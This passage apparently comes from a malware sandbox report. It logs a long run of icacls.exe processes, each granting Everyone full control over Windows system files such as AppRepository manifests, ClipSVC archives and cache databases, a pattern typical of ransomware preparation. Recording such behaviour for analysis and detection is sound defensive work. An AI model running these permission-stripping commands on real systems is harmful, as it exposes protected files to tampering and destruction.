  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\f1bb69b5-a7d1-df8f-5820-49f387fd5d2e.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5544
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\fc93b452-8a84-dede-3b7a-0fc9413c4592.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5016
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q
  2⤵
  PID:9944
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db /grant Everyone:F /T /C /Q
  2⤵
  PID:10820
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db /grant Everyone:F /T /C /Q
  2⤵
  PID:7296
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\ClipSVC\Archive\Apps\f1bb69b5-a7d1-df8f-5820-49f387fd5d2e.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8648
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\1527c705-839a-4832-9118-54d4Bd6a0c89_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10592
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\c5e2524a-ea46-4f67-841f-6a9465d9d515_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8472
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\CortanaListenUIApp_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15544
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\DesktopLearning_1000.15063.0.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6532
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\DesktopView_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:17360
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\E2A4F912-2574-4A75-9BB0-0D023378592B_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6024
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\EnvironmentsApp_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11676
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\HoloCamera_1.0.0.5_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8504
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\HoloItemPlayerApp_1.0.0.2_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15116
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\HoloShell_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10888
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-140_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13608
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13236
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16612
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16560
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.AAD.BrokerPlugin_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16596
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.AccountsControl_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10500
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Advertising.Xaml_10.0.1605.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8420
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Advertising.Xaml_10.0.1605.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10588
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:10968
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_neutral_split.scale-150_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13272
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:10956
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15956
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BioEnrollment_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12140
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BioEnrollment_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16528
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.CredDialogHost_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8528
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8536
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13708
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10628
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.1.25002.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8520
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.1.25002.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10516
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Getstarted_4.5.6.0_neutral_split.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12604
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Getstarted_4.5.6.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10872
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9912
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.LockApp_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:16364
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Messaging_3.2.24002.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:3908
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Messaging_3.26.24002.0_neutral_split.scale-150_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9952
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15864
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Microsoft3DViewer_1.1702.21039.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6004
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Microsoft3DViewer_1.1702.21039.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15352
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftEdge_40.15063.0.0_neutral__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14352
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:2980
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftOfficeHub_2017.311.255.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6032
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11580
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16284
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12308
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5380
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10428
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9972
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12352
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15456
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1700
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MSPaint_1.1702.28017.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:8796
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14236
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15464
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10000
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.3_1.3.23901.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1780
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.3_1.3.23901.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1540
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.4_1.4.24201.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7372
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.4_1.4.24201.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4976
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11688
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Office.OneNote_2015.7668.58071.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5100
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8716
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16812
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6596
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11720
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_10.1.10531.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16820
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_10.1.10531.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16844
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10132
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_2017.222.1920.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1520
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.PPIProjection_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5128
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-125_kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:2436
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_neutral_~_kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1240
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_neutral_~_kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:3176
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5392
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.StorePurchaseApp_1.0.45.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1976
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.StorePurchaseApp_1.0.454.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:3836
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.VCLibs.140.00_14.0.24123.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:2324
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.VCLibs.140.00_14.0.24123.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:3832
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1232
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:504
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4592
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.AssignedAccessLockApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:204
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.CloudExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1324
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4320
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4108
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.HolographicFirstRun_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4216
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ModalSharePickerHost_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17068
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4936
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.OOBENetworkConnectionFlow_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4548
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ParentalControls_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:15304
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4400
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Photos_2016.511.9510.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4372
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4820
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6212
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4396
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4616
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.WindowPicker_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4128
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6524
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5736
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_2017.203.236.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15288
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCalculator_10.1702.312.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11344
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:15592
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCalculator_2017.131.1904.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6440
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCamera_2017.125.40.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4812
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4916
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4280
